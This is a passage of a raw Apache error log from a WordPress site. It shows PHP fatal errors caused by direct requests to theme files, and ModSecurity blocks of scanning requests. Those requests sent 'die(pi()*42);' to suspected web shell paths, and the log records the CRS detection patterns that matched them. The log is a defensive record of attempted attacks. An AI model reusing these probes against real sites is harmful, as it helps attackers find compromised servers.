152.89.196.102:34260] Stack trace: [Tue Aug 09 20:38:11.338016 2022] [:error] [pid 29371:tid 140372592215808] [client 152.89.196.102:34260] #0 {main} [Tue Aug 09 20:38:11.338118 2022] [:error] [pid 29371:tid 140372592215808] [client 152.89.196.102:34260] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/footer.php on line 22 [Tue Aug 09 20:38:15.531680 2022] [:error] [pid 29975:tid 140372575430400] [client 152.89.196.102:34262] PHP Fatal error: Uncaught Error: Call to undefined function get_template_part() in /home/investig/public_html/wp-content/themes/twentyseventeen/footer.php:22 [Tue Aug 09 20:38:15.531766 2022] [:error] [pid 29975:tid 140372575430400] [client 152.89.196.102:34262] Stack trace: [Tue Aug 09 20:38:15.531779 2022] [:error] [pid 29975:tid 140372575430400] [client 152.89.196.102:34262] #0 {main} [Tue Aug 09 20:38:15.531869 2022] [:error] [pid 29975:tid 140372575430400] [client 152.89.196.102:34262] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/footer.php on line 22 [Tue Aug 09 21:00:06.106967 2022] [:error] [pid 29373:tid 140372634179328] [client 152.89.196.102:34616] PHP Fatal error: Uncaught Error: Call to undefined function is_active_sidebar() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php:14 [Tue Aug 09 21:00:06.107070 2022] [:error] [pid 29373:tid 140372634179328] [client 152.89.196.102:34616] Stack trace: [Tue Aug 09 21:00:06.107085 2022] [:error] [pid 29373:tid 140372634179328] [client 152.89.196.102:34616] #0 {main} [Tue Aug 09 21:00:06.107213 2022] [:error] [pid 29373:tid 140372634179328] [client 152.89.196.102:34616] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php on line 14 [Tue Aug 09 21:00:09.170030 2022] [:error] [pid 29975:tid 140372550252288] [client 152.89.196.102:34620] PHP Fatal error: Uncaught Error: Call to undefined function is_active_sidebar() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php:14 [Tue Aug 09 21:00:09.170129 2022] [:error] [pid 29975:tid 140372550252288] [client 152.89.196.102:34620] Stack trace: [Tue Aug 09 21:00:09.170140 2022] [:error] [pid 29975:tid 140372550252288] [client 152.89.196.102:34620] #0 {main} [Tue Aug 09 21:00:09.170227 2022] [:error] [pid 29975:tid 140372550252288] [client 152.89.196.102:34620] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php on line 14 [Tue Aug 09 21:00:11.939760 2022] [:error] [pid 29975:tid 140372718106368] [client 152.89.196.102:34622] PHP Fatal error: Uncaught Error: Call to undefined function is_active_sidebar() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php:14 [Tue Aug 09 21:00:11.939850 2022] [:error] [pid 29975:tid 140372718106368] [client 152.89.196.102:34622] Stack trace: [Tue Aug 09 21:00:11.939864 2022] [:error] [pid 29975:tid 140372718106368] [client 152.89.196.102:34622] #0 {main} [Tue Aug 09 21:00:11.939989 2022] [:error] [pid 29975:tid 140372718106368] [client 152.89.196.102:34622] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php on line 14 [Tue Aug 09 22:31:36.388414 2022] [:error] [pid 29975:tid 140372558644992] [client 152.89.196.102:36352] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/page.php:18 [Tue Aug 09 22:31:36.388484 2022] [:error] [pid 29975:tid 140372558644992] [client 152.89.196.102:36352] Stack trace: [Tue Aug 09 22:31:36.388494 2022] [:error] [pid 29975:tid 140372558644992] [client 152.89.196.102:36352] #0 {main} [Tue Aug 09 22:31:36.388562 2022] [:error] [pid 29975:tid 140372558644992] [client 152.89.196.102:36352] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/page.php on line 18 [Tue Aug 09 22:31:38.213666 2022] [:error] [pid 29975:tid 140372609001216] [client 152.89.196.102:36354] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/page.php:18 [Tue Aug 09 22:31:38.213768 2022] [:error] [pid 29975:tid 140372609001216] [client 152.89.196.102:36354] Stack trace: [Tue Aug 09 22:31:38.213782 2022] [:error] [pid 29975:tid 140372609001216] [client 152.89.196.102:36354] #0 {main} [Tue Aug 09 22:31:38.213874 2022] [:error] [pid 29975:tid 140372609001216] [client 152.89.196.102:36354] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/page.php on line 18 [Tue Aug 09 22:31:40.826026 2022] [:error] [pid 29975:tid 140372676142848] [client 152.89.196.102:36358] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/page.php:18 [Tue Aug 09 22:31:40.826115 2022] [:error] [pid 29975:tid 140372676142848] [client 152.89.196.102:36358] Stack trace: [Tue Aug 09 22:31:40.826128 2022] [:error] [pid 29975:tid 140372676142848] [client 152.89.196.102:36358] #0 {main} [Tue Aug 09 22:31:40.826224 2022] [:error] [pid 29975:tid 140372676142848] [client 152.89.196.102:36358] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/page.php on line 18 [Tue Aug 09 23:21:40.240609 2022] [:error] [pid 29371:tid 140372684535552] [client 152.89.196.102:37218] PHP Fatal error: Uncaught Error: Call to undefined function esc_attr_e() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php:12 [Tue Aug 09 23:21:40.240689 2022] [:error] [pid 29371:tid 140372684535552] [client 152.89.196.102:37218] Stack trace: [Tue Aug 09 23:21:40.240699 2022] [:error] [pid 29371:tid 140372684535552] [client 152.89.196.102:37218] #0 {main} [Tue Aug 09 23:21:40.240787 2022] [:error] [pid 29371:tid 140372684535552] [client 152.89.196.102:37218] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php on line 12 [Tue Aug 09 23:21:44.068008 2022] [:error] [pid 29371:tid 140372701320960] [client 152.89.196.102:37220] PHP Fatal error: Uncaught Error: Call to undefined function esc_attr_e() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php:12 [Tue Aug 09 23:21:44.068084 2022] [:error] [pid 29371:tid 140372701320960] [client 152.89.196.102:37220] Stack trace: [Tue Aug 09 23:21:44.068095 2022] [:error] [pid 29371:tid 140372701320960] [client 152.89.196.102:37220] #0 {main} [Tue Aug 09 23:21:44.068196 2022] [:error] [pid 29371:tid 140372701320960] [client 152.89.196.102:37220] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php on line 12 [Tue Aug 09 23:21:48.426297 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:37222] PHP Fatal error: Uncaught Error: Call to undefined function esc_attr_e() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php:12 [Tue Aug 09 23:21:48.426381 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:37222] Stack trace: [Tue Aug 09 23:21:48.426396 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:37222] #0 {main} [Tue Aug 09 23:21:48.426495 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:37222] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php on line 12 [Tue Aug 09 23:37:01.200244 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:37452] PHP Fatal error: Uncaught Error: Call to undefined function esc_url() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/site-info.php:18 [Tue Aug 09 23:37:01.200341 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:37452] Stack trace: [Tue Aug 09 23:37:01.200356 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:37452] #0 {main} [Tue Aug 09 23:37:01.200478 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:37452] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/site-info.php on line 18 [Tue Aug 09 23:37:02.239822 2022] [:error] [pid 29975:tid 140372701320960] [client 152.89.196.102:37454] PHP Fatal error: Uncaught Error: Call to undefined function esc_url() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/site-info.php:18 [Tue Aug 09 23:37:02.239890 2022] [:error] [pid 29975:tid 140372701320960] [client 152.89.196.102:37454] Stack trace: [Tue Aug 09 23:37:02.239900 2022] [:error] [pid 29975:tid 140372701320960] [client 152.89.196.102:37454] #0 {main} [Tue Aug 09 23:37:02.239983 2022] [:error] [pid 29975:tid 140372701320960] [client 152.89.196.102:37454] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/site-info.php on line 18 [Tue Aug 09 23:37:03.542126 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:37464] PHP Fatal error: Uncaught Error: Call to undefined function esc_url() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/site-info.php:18 [Tue Aug 09 23:37:03.542190 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:37464] Stack trace: [Tue Aug 09 23:37:03.542201 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:37464] #0 {main} [Tue Aug 09 23:37:03.542316 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:37464] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/site-info.php on line 18 [Wed Aug 10 00:02:21.232952 2022] [:error] [pid 29975:tid 140372600608512] [client 152.89.196.102:37952] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/single.php:13 [Wed Aug 10 00:02:21.233047 2022] [:error] [pid 29975:tid 140372600608512] [client 152.89.196.102:37952] Stack trace: [Wed Aug 10 00:02:21.233061 2022] [:error] [pid 29975:tid 140372600608512] [client 152.89.196.102:37952] #0 {main} [Wed Aug 10 00:02:21.233152 2022] [:error] [pid 29975:tid 140372600608512] [client 152.89.196.102:37952] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/single.php on line 13 [Wed Aug 10 00:02:37.153101 2022] [:error] [pid 29371:tid 140372558644992] [client 152.89.196.102:37962] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/single.php:13 [Wed Aug 10 00:02:37.153169 2022] [:error] [pid 29371:tid 140372558644992] [client 152.89.196.102:37962] Stack trace: [Wed Aug 10 00:02:37.153179 2022] [:error] [pid 29371:tid 140372558644992] [client 152.89.196.102:37962] #0 {main} [Wed Aug 10 00:02:37.153244 2022] [:error] [pid 29371:tid 140372558644992] [client 152.89.196.102:37962] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/single.php on line 13 [Wed Aug 10 00:02:46.029690 2022] [:error] [pid 29372:tid 140372659357440] [client 152.89.196.102:37972] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/single.php:13 [Wed Aug 10 00:02:46.029787 2022] [:error] [pid 29372:tid 140372659357440] [client 152.89.196.102:37972] Stack trace: [Wed Aug 10 00:02:46.029803 2022] [:error] [pid 29372:tid 140372659357440] [client 152.89.196.102:37972] #0 {main} [Wed Aug 10 00:02:46.029903 2022] [:error] [pid 29372:tid 140372659357440] [client 152.89.196.102:37972] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/single.php on line 13 [Wed Aug 10 02:53:01.774965 2022] [:error] [pid 29373:tid 140372726499072] [client 152.89.196.102:41978] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:atime. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:atime: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/js.php"] [unique_id "YvNj3YfZxeIP9Uc1qos16AAAAIM"] [Wed Aug 10 02:53:04.138830 2022] [:error] [pid 29372:tid 140372617393920] [client 152.89.196.102:41980] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:atime. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:atime: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/js.php"] [unique_id "YvNj4CGeH44ufVD7B05LaQAAAFA"] [Wed Aug 10 02:53:07.730443 2022] [:error] [pid 29373:tid 140372634179328] [client 152.89.196.102:41982] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:atime. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:atime: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/js.php"] [unique_id "YvNj44fZxeIP9Uc1qos16QAAAI4"] [Wed Aug 10 05:39:49.962736 2022] [:error] [pid 11588:tid 140306389305088] [client 152.89.196.102:45816] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-image.php:15 [Wed Aug 10 05:39:49.962804 2022] [:error] [pid 11588:tid 140306389305088] [client 152.89.196.102:45816] Stack trace: [Wed Aug 10 05:39:49.962832 2022] [:error] [pid 11588:tid 140306389305088] [client 152.89.196.102:45816] #0 {main} [Wed Aug 10 05:39:49.962949 2022] [:error] [pid 11588:tid 140306389305088] [client 152.89.196.102:45816] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-image.php on line 15 [Wed Aug 10 05:39:50.392562 2022] [:error] [pid 11588:tid 140306582337280] [client 152.89.196.102:45818] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-image.php:15 [Wed Aug 10 05:39:50.392656 2022] [:error] [pid 11588:tid 140306582337280] [client 152.89.196.102:45818] Stack trace: [Wed Aug 10 05:39:50.392669 2022] [:error] [pid 11588:tid 140306582337280] [client 152.89.196.102:45818] #0 {main} [Wed Aug 10 05:39:50.392753 2022] [:error] [pid 11588:tid 140306582337280] [client 152.89.196.102:45818] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-image.php on line 15 [Wed Aug 10 05:39:53.548696 2022] [:error] [pid 11588:tid 140306548766464] [client 152.89.196.102:45826] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-image.php:15 [Wed Aug 10 05:39:53.548788 2022] [:error] [pid 11588:tid 140306548766464] [client 152.89.196.102:45826] Stack trace: [Wed Aug 10 05:39:53.548803 2022] [:error] [pid 11588:tid 140306548766464] [client 152.89.196.102:45826] #0 {main} [Wed Aug 10 05:39:53.548926 2022] [:error] [pid 11588:tid 140306548766464] [client 152.89.196.102:45826] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-image.php on line 15 [Wed Aug 10 07:15:52.389783 2022] [:error] [pid 11588:tid 140306380912384] [client 152.89.196.102:47822] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache/index3.php"] [unique_id "YvOhePXhIUUStGo-2uzPmQAAAFg"] [Wed Aug 10 07:15:53.870093 2022] [:error] [pid 11588:tid 140306389305088] [client 152.89.196.102:47824] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache/index3.php"] [unique_id "YvOhefXhIUUStGo-2uzPmgAAAFc"] [Wed Aug 10 07:15:55.634312 2022] [:error] [pid 11588:tid 140306573944576] [client 152.89.196.102:47826] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache/index3.php"] [unique_id "YvOhe_XhIUUStGo-2uzPmwAAAEE"] [Wed Aug 10 10:05:28.223573 2022] [:error] [pid 12198:tid 140306389305088] [client 152.89.196.102:51886] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:bot. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:bot: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/index.php"] [unique_id "YvPJOJra19kguIAYVdtP1wAAANc"] [Wed Aug 10 10:05:32.872292 2022] [:error] [pid 11588:tid 140306456446720] [client 152.89.196.102:51896] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:bot. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:bot: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/index.php"] [unique_id "YvPJPPXhIUUStGo-2uzRBgAAAE8"] [Wed Aug 10 10:05:37.693669 2022] [:error] [pid 12198:tid 140306490017536] [client 152.89.196.102:51902] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:bot. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:bot: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/index.php"] [unique_id "YvPJQZra19kguIAYVdtP2gAAAMs"] [Wed Aug 10 10:35:38.033235 2022] [autoindex:error] [pid 11588:tid 140306582337280] [client 79.110.62.176:52628] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 10 10:36:10.393021 2022] [:error] [pid 11588:tid 140306490017536] [client 79.110.62.176:52638] [client 79.110.62.176] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:l. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-plain.php"] [unique_id "YvPQavXhIUUStGo-2uzRQwAAAEs"] [Wed Aug 10 15:32:27.717874 2022] [autoindex:error] [pid 11587:tid 140306506802944] [client 80.76.51.29:59666] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Aug 11 01:06:52.106564 2022] [:error] [pid 14107:tid 140306406090496] [client 152.89.196.13:46394] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/index3.php"] [unique_id "YvScfLV-zqU5XsNb7agtFAAAAJU"] [Thu Aug 11 01:06:57.744665 2022] [:error] [pid 14105:tid 140306389305088] [client 152.89.196.13:46400] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/index3.php"] [unique_id "YvScgRP8pXxcAW98gRPSVAAAABc"] [Thu Aug 11 01:07:02.314785 2022] [:error] [pid 14107:tid 140306481624832] [client 152.89.196.13:46404] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match 